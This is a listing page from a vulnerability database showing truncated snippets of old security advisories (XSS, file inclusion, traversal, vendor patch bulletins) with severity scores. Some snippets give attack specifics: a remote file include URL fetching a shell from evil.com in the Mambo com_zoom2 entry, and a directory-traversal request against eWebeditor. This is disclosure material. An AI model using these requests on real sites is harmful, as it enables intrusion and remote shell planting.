Securityvulns: Most viewed

47153 matches found

securityvulns, added 2011/12/04 12:0 a.m., 128 views

Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities

a bug in Wordpress flash-album-gallery plugin that allows to us to occur a Cross-Site Scripting on a Remote machine. Islamic Republic Of Iran Security Team http://irist.ir/forum/ Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities Download......:...

AI score: 0.1, Exploits: 0

securityvulns, added 2011/10/15 12:0 a.m., 128 views

APPLE-SA-2011-10-12-1 iOS 5 Software Update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-1 iOS 5 Software Update iOS 5 Software Update is now available and addresses the following: CalDAV Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch 3rd generation and later, iOS...

CVSS: 10, EPSS: 0.73327, Exploits: 41

securityvulns, added 2011/06/27 12:0 a.m., 128 views

XSS and AoF vulnerabilities in Drupal

Hello 3APA3A! I am reporting the Cross-Site Scripting and Abuse of Functionality vulnerabilities I have found in Drupal. XSS WASC-08: When adding or changing data in any internal forms adding/editing a post, etc. a persistent XSS attack can be carried out. The XSS code will execute when visiting...

AI score: 5.8, Exploits: 0

securityvulns, added 2011/06/10 12:0 a.m., 128 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

AI score: 0.3, Exploits: 0

securityvulns, added 2011/05/08 12:0 a.m., 128 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits: 0

securityvulns, added 2010/10/28 12:0 a.m., 128 views

LFI in DZCP

Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Fixed by Vendor Risk level: High Credit: High-Tech...

AI score: 6.5, Exploits: 0

securityvulns, added 2010/08/05 12:0 a.m., 128 views

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances Advisory ID: cisco-sa-20100804-asa http://www.cisco.com/warp/public/707/cisco-sa-20100804-asa.shtml Revision 1.0 For Public Release 2010 August 04...

CVSS: 7.8, AI score: 1, EPSS: 0.02496, Exploits: 0

securityvulns, added 2010/08/03 12:0 a.m., 128 views

Microsoft Windows shortcuts code execution

Code execution on shortcut icon displaying...

CVSS: 9.3, AI score: 2, EPSS: 0.91324, Exploits: 13, References: 1, Affected Software: 1

securityvulns, added 2010/01/21 12:0 a.m., 128 views

eWebeditor Directory Traversal Vulnerability

Securitylab.ir Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./.. Discovered By: Pouya Daneshmand Website: http://securitylab.ir Contacts:...

AI score: 0.7, Exploits: 0

securityvulns, added 2009/12/15 12:0 a.m., 128 views

Oracle applications multiple security vulnerabilities

Oracle Critical Patch Update fixes 40 different vulnerabilities in all Oracle applications...

CVSS: 10, AI score: 2.4, EPSS: 0.61309, Exploits: 45, References: 24, Affected Software: 7

securityvulns, added 2009/11/11 12:0 a.m., 128 views

[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News

MorningStar Security - Advisory http://www.morningstarsecurity.com/ Multiple security issues in Cute News and UTF-8 Cute News 1. Advisory Information ------------------------------------------------------------------------------------------------------------------------ Title: Multiple security...

AI score: 7, Exploits: 0

securityvulns, added 2009/01/15 12:0 a.m., 128 views

US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...

AI score: 0.9, Exploits: 0

securityvulns, added 2008/10/03 12:0 a.m., 128 views

[USN-649-1] OpenSSH vulnerabilities

=========================================================== Ubuntu Security Notice USN-649-1 October 01, 2008 openssh vulnerabilities CVE-2008-1657, CVE-2008-4109 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS...

CVSS: 6.5, AI score: 0.2, EPSS: 0.28601, Exploits: 9

securityvulns, added 2008/04/27 12:0 a.m., 128 views

Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wordpress 2.5 Cookie Integrity Protection Vulnerability Original release date: 2008-04-25 Last revised: 2008-04-25 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt CVE ID: CVE-2008-1930 Source: Steven J. Murdoch http://www.cl.cam.ac.uk/users/sjm217/...

CVSS: 7.5, AI score: 0.8, EPSS: 0.05001, Exploits: 3

securityvulns, added 2007/12/24 12:0 a.m., 128 views

[CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability

Title: CAID 35970: CA Products That Embed Ingres Authentication Vulnerability CA Vuln ID CAID: 35970 CA Advisory Date: 2007-12-19 Reported By: Ingres Corporation Impact: Attacker can gain elevated privileges. Summary: A potential vulnerability exists in the Ingres software that is embedded in...

CVSS: 5, AI score: 6, EPSS: 0.01814, Exploits: 1

securityvulns, added 2007/12/12 12:0 a.m., 128 views

ZDI-07-073: Microsoft Internet Explorer setExpression Vulnerability

ZDI-07-073: Microsoft Internet Explorer setExpression Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-073.html December 11, 2007 -- CVE ID: CVE-2007-3902 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 5.01 SP4 Internet Explorer 6 Internet...

CVSS: 9.3, AI score: 0.9, EPSS: 0.35508, Exploits: 1

securityvulns, added 2007/12/07 12:0 a.m., 128 views

[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01188923 Version: 1 HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager OV NNM Remote Unauthorized Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should...

CVSS: 10, AI score: 0.7, EPSS: 0.69613, Exploits: 9

securityvulns, added 2007/11/29 12:0 a.m., 128 views

Liferay Enterprise Portal multiple XSS

Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...

AI score: 0.7, Exploits: 0

securityvulns, added 2007/11/12 12:0 a.m., 128 views

Web Mayhem: Firefox’s JAR: Protocol issues

Web Mayhem: Firefox’s JAR: Protocol issues published: November 7th, 2007 One of the things that we enjoy the most, here in GNUCITIZEN, is finding issues with features. Unlike bugs, insecure features tend to be more severe and usually last longer due to uneasy and rather long decision making proce...

AI score: 5.9, Exploits: 0

securityvulns, added 2007/06/19 12:0 a.m., 128 views

fusetalk SQL (autherror.cfm)

Hello everyone, After trying to report bugs to FuseTalk, and seeing them providing patches to customers dropping new fixed .cfm files in a private place reserved to customers without giving proper credits and without reporting them publicly we were following the Full Disclosure Policy v2.0, we...

AI score: 8.1, Exploits: 0

securityvulns, added 2007/05/12 12:0 a.m., 128 views

Multiple Denial of Service attacks possible for Webspeed OpenEdge

Denial of Service attack against OpenEdge WebSpeed possible through dict.r. 11-5-2007 author: Eelko Neven discovered: 9-5-2007 Because of poor security in dict.r it is possible to put all agents in busy mode. First you have to find the messenger execution url. For example:...

AI score: 0.6, Exploits: 0

securityvulns, added 2007/04/11 12:0 a.m., 128 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

AI score: 0.6, Exploits: 0

securityvulns, added 2007/01/30 12:0 a.m., 128 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 9.3, AI score: 1.5, EPSS: 0.69951, Exploits: 12, References: 12, Affected Software: 18

securityvulns, added 2006/11/28 12:0 a.m., 128 views

tar archiver directory traversal

A problem with parsing of the outdated GNUTYPENAMES structure allows symbolic links to be created outside the target directory...

AI score: 3.9, Exploits: 0, References: 1, Affected Software: 1

securityvulns, added 2006/11/09 12:0 a.m., 128 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

AI score: 0.7, Exploits: 0

securityvulns, added 2006/10/13 12:0 a.m., 128 views

ExtCalThai_Component <= 0.9.1 Remote File Inclusion

ExtCalThaiComponent = 0.9.1 Remote File Inclusion Download Source : http://mamboxchange.com/frs/download.php/6004/ExtCalThaiComponentv0.9.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; adminevents.php extcalendar.p mail.inc.phphp bugs ; at -...

AI score: 0.8, Exploits: 0

securityvulns, added 2006/10/11 12:0 a.m., 128 views

7 php scripts File Inclusion / Source disclosure Vuln

Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...

AI score: 7.2, Exploits: 0

securityvulns, added 2006/09/04 12:0 a.m., 128 views

OpenLDAP privilege escalation

User with 'selfwrite' ACL parameter can modify any attributes...

AI score: 3.8, Exploits: 0, References: 1, Affected Software: 1

securityvulns, added 2002/11/13 12:0 a.m., 128 views

Code Injection in phpBB Advanced Quick Reply Mod

Software: phpBB Advanced Quick Reply Mod I've found a security hole in this software Code Injection. You can download this software at http://phpbbhacks.com/viewhack.php?id=586 Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server local exploit...

Exploits: 0

securityvulns, added 2001/06/23 12:0 a.m., 128 views

Vulnerability in AIX diagrpt

This file contains security alerts published by the IBM Emergency Response Service. These alerts are published at the following URL on the world-wide web: http://www.ers.ibm.com/ In order to keep the size of this file reasonable, it contains only advisories for the current year. You can obtain a...

AI score: 0.8, Exploits: 0

securityvulns, added 2000/04/17 12:0 a.m., 128 views

StarOffice 5.1

Do you remember recent Microsoft Word and Wordpad vulnerabilities while reading .rtf documents? I realized that Sun StarOffice 5.1 is at least so buggy as M$ products. There are a lot of ways to cause overflow and crash or execution of arbitrary code while viewing documents - starting from html...

AI score: 0.9, Exploits: 0

securityvulns, added 2015/10/26 12:0 a.m., 127 views

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...

CVSS: 6.5, AI score: 0.4, EPSS: 0.59312, Exploits: 7

securityvulns, added 2015/05/10 12:0 a.m., 127 views

[SYSS-2015-018] BullGuard Premium Protection - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-018 Product: BullGuard Premium Protection Vendor: BullGuard Ltd. Affected Versions: 15.0.297 Tested Versions: 15.0.297 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level: Medium...

AI score: 0.2, Exploits: 0

securityvulns, added 2014/12/11 12:0 a.m., 127 views

APPLE-SA-2014-12-2-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2014-12-3-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 is now available and addresses the following: WebKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite...

CVSS: 7.5, AI score: 0.3, EPSS: 0.04583, Exploits: 0

securityvulns, added 2014/10/15 12:0 a.m., 127 views

[USN-2383-1] wpa_supplicant vulnerability

========================================================================== Ubuntu Security Notice USN-2383-1 October 14, 2014 wpa, wpasupplicant vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...

CVSS: 6.8, AI score: 0.3, EPSS: 0.04945, Exploits: 0

securityvulns, added 2014/09/21 12:0 a.m., 127 views

APPLE-SA-2014-09-17-2 Apple TV 7

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-09-17-2 Apple TV 7 Apple TV 7 is now available and addresses the following: Apple TV Available for: Apple TV 3rd generation and later Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi...

CVSS: 9.3, AI score: 0.3, EPSS: 0.49049, Exploits: 9

securityvulns, added 2014/06/26 12:0 a.m., 127 views

[USN-2253-1] LibreOffice vulnerability

========================================================================== Ubuntu Security Notice USN-2253-1 June 23, 2014 libreoffice vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

CVSS: 10, AI score: 1, EPSS: 0.03922, Exploits: 0

securityvulns, added 2014/05/29 12:0 a.m., 127 views

[SECURITY] [DSA 2937-1] mod-wsgi security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2937-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq -...

CVSS: 6.2, AI score: 1.7, EPSS: 0.08526, Exploits: 0

securityvulns, added 2014/05/10 12:0 a.m., 127 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 6.8, AI score: 1.6, EPSS: 0.53703, Exploits: 16, References: 11, Affected Software: 8

securityvulns, added 2013/12/09 12:0 a.m., 127 views

Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities

Document Title: =============== Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1117 Release Date: ============= 2013-10-18 Vulnerability Laboratory ID VL-ID:...

AI score: 0.1, Exploits: 0

securityvulns, added 2013/02/18 12:0 a.m., 127 views

[USN-1722-1] jQuery vulnerability

========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

CVSS: 4.3, AI score: 0.2, EPSS: 0.19191, Exploits: 1

securityvulns, added 2013/01/14 12:0 a.m., 127 views

Adobe ColdFusion multiple security vulnerabilities

Authentication bypass, privilege escalation, information leakage...

CVSS: 10, AI score: 3.1, EPSS: 0.93797, Exploits: 12, Affected Software: 1

securityvulns, added 2012/09/03 12:0 a.m., 127 views

Cross-Site Scripting (XSS) in Jease

Advisory ID: HTB23104 Product: Jease Vendor: jease.org Vulnerable Versions: 2.8 and probably prior Tested Version: 2.8 Vendor Notification: July 25, 2012 Public Disclosure: August 15, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4052 CVSSv2 Base Score: 4.3...

CVSS: 4.3, AI score: 6.5, EPSS: 0.01148, Exploits: 0

securityvulns, added 2012/06/03 12:0 a.m., 127 views

Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access

OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...

AI score: 0.8, Exploits: 0

securityvulns, added 2012/02/14 12:0 a.m., 127 views

D-Link DIR-601 TFTP Directory Traversal Vulnerability

Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...

AI score: 0.2, Exploits: 0

securityvulns, added 2012/02/03 12:0 a.m., 127 views

[Announce] Apache HTTP Server 2.2.22 Released

Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...

CVSS: 5, EPSS: 0.90734, Exploits: 23

securityvulns, added 2012/01/09 12:0 a.m., 127 views

Multiple vulnerabilities in ImpressCMS

Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...

AI score: 6.7, Exploits: 0

securityvulns, added 2011/12/19 12:0 a.m., 127 views

[RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass

Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details ======= Product: Owl Intranet...

Exploits: 0

securityvulns, added 2011/11/27 12:0 a.m., 127 views

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 Published: 2011/11/16 Version 1.0 Affected products: iTop version 1.1.181, 1.2.0-RC-282 maybe earlier versions as well http://sourceforge.net/projects/itop/ References: CVE-2011-4275 - Multiple web-vulnerabilities in iTop...

CVSS: 4.3, AI score: 5.5, EPSS: 0.01624, Exploits: 2

securityvulns, added 2011/10/04 12:0 a.m., 127 views

Elastix PBX Extensions Enumeration

Exploit Title: Elastix PBX Extensions Enumeration Date: 1 Oct 2011 Author: Bassem Saleh Contact: Injectoratlivedotcom Software Link: http://www.elastix.org/ Version: 2.X and may be below versions Tested on: 2.0.3 ================================================================ Non privileges user...

AI score: 1.7, Exploits: 0

Total number of security vulnerabilities: 5000